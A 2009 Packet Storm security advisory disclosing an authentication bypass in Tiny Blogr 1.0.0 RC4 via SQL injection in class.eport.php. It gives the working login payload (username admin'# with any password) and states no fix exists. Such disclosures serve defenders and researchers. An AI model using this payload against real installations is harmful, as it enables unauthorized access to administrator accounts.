Tiny Blogr 1.0.0 RC4 SQL Injection

2009-04-17T00:00:00
ID PACKETSTORM:76774
Type packetstorm
Reporter Salvatore Fresta
Modified 2009-04-17T00:00:00

Description

                                        
                                            `******* Salvatore "drosophila" Fresta *******  
  
[+] Application: Tiny Blogr  
[+] Version: 1.0.0 rc4  
[+] Website: http://tinyblogr.sourceforge.net  
  
[+] Bugs: [A] Authentication Bypass  
  
[+] Exploitation: Remote  
[+] Date: 17 Apr 2009  
  
[+] Discovered by: Salvatore "drosophila" Fresta  
[+] Author: Salvatore "drosophila" Fresta  
[+] Contact: e-mail: drosophilaxxx@gmail.com  
  
  
*************************************************  
  
[+] Menu  
  
1) Bugs  
2) Code  
3) Fix  
  
  
*************************************************  
  
[+] Bugs  
  
  
- [A] Authentication Bypass  
  
[-] Risk: medium  
[-] Requisites: magic_quotes_gpc = off  
[-] File affected: class.eport.php  
  
This bug allows a guest to bypass the authentication  
system.  
  
  
*************************************************  
  
[+] Code  
  
  
- [A] Authenticaion Bypass  
  
Username: admin'#  
Password: foo  
  
  
*************************************************  
  
[+] Fix  
  
No fix.  
  
  
*************************************************  
  
`